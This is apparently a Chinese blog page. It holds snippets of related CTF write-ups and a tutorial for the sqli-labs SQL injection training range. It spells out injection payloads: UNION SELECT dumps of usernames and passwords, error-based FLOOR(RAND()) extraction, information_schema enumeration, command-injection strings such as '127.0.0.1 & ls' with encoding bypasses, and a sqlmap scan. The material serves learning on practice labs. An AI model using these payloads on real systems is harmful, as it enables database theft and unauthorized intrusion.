布尔注入 页面在执行sql语句后,只会显示两种结果,Tuer or False 也就意味着,它不需要报错,不需要知道准确的字段个数, 归根结底它只关心一点: 我们的sql到底有没有被执行成功 在本次注入中,我们会频繁的使用到下面命令: length(str):返回str字符串的长度 substr(str, pos, len):str:要截取的字符串,pos:开始截取的位置,len:截取的长度 将str从pos位置开始截取len长度的字符进 行返回。注意这里的pos位置是从1开始 的,不
PortSwigger web实验室(BurpSuit官方靶场)之SQL注入
m0_74824002的博客
12-13 1210
Hi~ o( ̄▽ ̄)ブ,我是一名刚刚开始学习网安的新手。在做PortSwigger实验室(也就是BurpSuit官方做的靶场和学习中心)题目的时候发现对于新手来说还是有很多问题的。上网搜索相关文章发现可能是官方跟新了靶场的题目,导致很多文章已经“货不对板”了。思来想去最后决定自己来写一篇通关文章!如果有什么地方写的不好或者有什么错误欢迎大伙指出批评~~ps:该文章包含大量我作为初学者在解题过程中的学习过程和内容,可能会显得很臃肿。
webug4.0通关笔记----(第一天:显错注入
liver100day的博客
04-23 844
布尔注入 布尔盲注:根据注入信息返回true or fales 没有任何报错信息 非法的用户可根据返回的报错信息,获取到数据库的重要信息 开始注入 在本次注入中,我们会频繁的使用到下面命令: length(str):返回str字符串的长度。 substr(str, pos, len):str:要截取的字符串,pos:开始截取的位置,len:截取的长度 将str从pos位置开始截取len长度的字符进 行返回。注意这里的pos位置是从1开始 的,不是数组的0开始 mid(str,pos,l
CTF学习笔记12:iwebsec-SQL注入漏洞-10-双重url编码绕过
lvx++的博客
01-23 1286
一、用第8题大小写绕过一样的payload就能得到结果 ?id=-1 union Select 1,2,group_concat(concat(username,0x7e,password)) from iwebsec.users 二、进行一次urlencode编码来测试一下,也可以得到结果 ?id=-1%20union%20Select%201%2C2%2Cgroup_concat(concat(username%2C0x7e%2Cpassword))%20from%20iwebsec.users
iwebsec靶场 文件包含漏洞通关笔记10-data伪协议利用
mooyuan的网络安全博客
09-14 752
本文通过《iwebsec靶场文件包含漏洞第十关 10 data伪协议》来进行渗透实战。如下所示include函数对GET参数filename没有任何过滤,存在文件包含漏洞。访问后如下所示,提示使用data协议进行渗透。
什么是URL/URL编码绕过
好好睡觉
11-07 3682
URLURL绕过
XSS三重URL编码绕过实例
04-11 988
遇到一个很奇葩的XSS,我们先来加一个双引号,看看输出: 双引号被转义了,我们对双引号进行URL双重编码,再看一下输出: 依然被转义了,我们再加一层URL编码,即三重url编码,再看一下输出: URL编码被还原为双引号,并带入到html中输入。构造Payload实现弹窗 转载于:https://www.cnblogs.com/xiaozi/p/8793...
编码绕过
weixin_30430169的博客
05-03 473
1. 绕过payload :union select 1,2,unhex(hex(table_name)),4,5,6,7,8,9,10,11,12,13,14,15 from information_schema.tables where table_schema='cms' 采用了16进制编码。 转载于:https://www.cnblogs.com/pangya/p/89...
实验吧-PHP大法-eregi()函数
07-31 859
题目地址:http://www.shiyanbar.com/ctf/54 题目: <?php if(eregi("hackerDJ",$_GET[id])) { echo("<p>not allowed!</p>"); exit(); } $_GET[id] = urldecode($_GET[id]); if($_GET[i...
绕过函数方法
qq_50613938的博客
11-03 478
127.0.0.1 & ls ——ll ;查看本地目录 当某一些字符被过滤掉,绕过 “;”分隔符可以使用%0a代替 |,||,&,&&,五个管道符 不加通配符的like可以用来当做=号使用 空格键;/**/ () 回车(url编码中的%0a) `(tap键上面的按钮) tap 两个空格 %0a代替换行,%09代替TAB键(因为flag被过滤了,所以我们通过TAB来补全flag_is_here) %5c代替\(用\来分隔开cat,因为cat也被过滤了qwq)%27是单引号 ca
Bugku -代码审计(urldecode二次编码绕过
weixin_34072857的博客
05-31 360
最近这段时间在做关于代码审计方面的题目,这一次把做的题目的解析发出来,希望能够帮助到学习代码审计的人。 这些题目我会全部上传解析过程哦!!!! 1: 解题思路:蒙蒙的我只有上网百度一下: 看到这些就知道应该如何构造post了:就是这样的: ?shiyan=&flag=就会得到答案: flag{bugku-dmsj-p2sm3...
通关sqli-labs靶场,熟悉sqli语法并且做好笔记
最新发布
07-22
### SQL注入基础与sqli-labs靶场学习指南 SQL注入是一种常见的Web安全漏洞,攻击者通过在输入字段中注入恶意SQL代码,从而操控后端数据库,获取、篡改或删除敏感数据。为了系统性地学习和掌握SQL注入技术,可以使用 **sqli-labs** 靶场进行实战训练。该靶场由一系列基于不同注入类型的挑战组成,适合从基础到进阶的全面学习。 #### sqli-labs 环境搭建 sqli-labs 是一个基于PHP/MySQLSQL注入练习平台,使用前需要配置好Web环境,例如: - 安装 XAMPP 或 WAMP 等本地服务器环境 - 下载 sqli-labs 项目并部署到 `htdocs` 目录 - 启动 Apache 和 MySQL 服务 - 访问 `http://localhost/sqlilabs` 安装数据库并初始化数据 完成环境搭建后,即可开始逐关挑战。 #### 注入类型判断 在开始每一关挑战时,首先应判断是否存在SQL注入漏洞以及注入类型。常见方法包括: - **正常输入与错误输入对比**:输入正常数据和特殊字符(如 `'`、`"`、`')` 等),观察页面是否报错或行为异常。 - **报错注入**:利用数据库报错信息返回数据,例如使用 `UpdateXML()`、`ExtractValue()` 等函数。 - **联合查询注入(UNION Query Injection)**:通过 `UNION SELECT` 查询获取额外数据。 - **布尔盲注**:通过构造布尔条件判断数据库内容。 - **时间盲注**:使用 `SLEEP()` 等函数判断数据库响应时间差异。 #### 判断SQL查询结果列数 在联合注入中,需要确保注入的 `SELECT` 语句与原查询列数一致。常用方法如下: - 使用 `ORDER BY` 猜测列数:例如 `?id=1' ORDER BY 3 --+`,若页面正常则列数大于等于3;若报错则小于3。 - 使用 `UNION SELECT` 配合 `NULL` 值进行验证:例如 `?id=-1' UNION SELECT NULL, NULL, NULL --+`,逐步增加 `NULL` 数量以匹配实际列数。 #### 报错注入实践(以 UpdateXML 为例) 在某些关卡中,无法直接通过联合注入获取数据,但可通过报错注入方式提取信息: ```sql ? id=1' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT((SELECT DATABASE()), FLOOR(RAND(0)*2)) x FROM INFORMATION_SCHEMA.COLUMNS GROUP BY x) a) --+ ``` 该语句会尝试执行一个会报错的查询,并将数据库名回显在错误信息中。若信息被截断,可使用 `RIGHT()` 函数进行偏移读取完整内容: ```sql ? id=1' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT(RIGHT((SELECT DATABASE()), 10), FLOOR(RAND(0)*2)) x FROM INFORMATION_SCHEMA.COLUMNS GROUP BY x) a) --+ ``` #### 爆破表名与列名 一旦确认注入点,可尝试从 `INFORMATION_SCHEMA` 中提取数据库结构信息: - **爆破数据库名**: ```sql ? id=1' UNION SELECT schema_name, NULL FROM information_schema.schemata LIMIT 0,1 --+ ``` - **爆破表名**(以数据库名为 `security` 为例): ```sql ? id=1' UNION SELECT table_name, NULL FROM information_schema.tables WHERE table_schema='security' LIMIT 0,1 --+ ``` - **爆破列名**(以表名为 `users` 为例): ```sql ? id=1' UNION SELECT column_name, NULL FROM information_schema.columns WHERE table_name='users' LIMIT 0,1 --+ ``` #### 数据提取 在获取列名后,即可提取具体数据: ```sql ? id=1' UNION SELECT username, password FROM users --+ ``` 若页面回显区域有限,可使用 `RIGHT()`、`SUBSTRING()` 等函数分段提取长字符串。 #### 工具辅助与深入学习 虽然手工注入有助于理解原理,但在实际渗透测试中,推荐使用自动化工具如 **sqlmap**,它支持多种注入方式和数据库类型,命令示例如下: ```bash sqlmap -u "http://localhost/Less-1/?id=1" --batch --risk=3 --level=5 --dbs ``` 该命令将扫描目标URL注入点并列出数据库。 若希望深入掌握SQL注入原理,建议结合手工注入与工具使用,理解每一步的注入逻辑,并尝试使用PHP等语言编写简单的数据库查询脚本,模拟注入过程。 --- ###
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

mooyuan天天

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值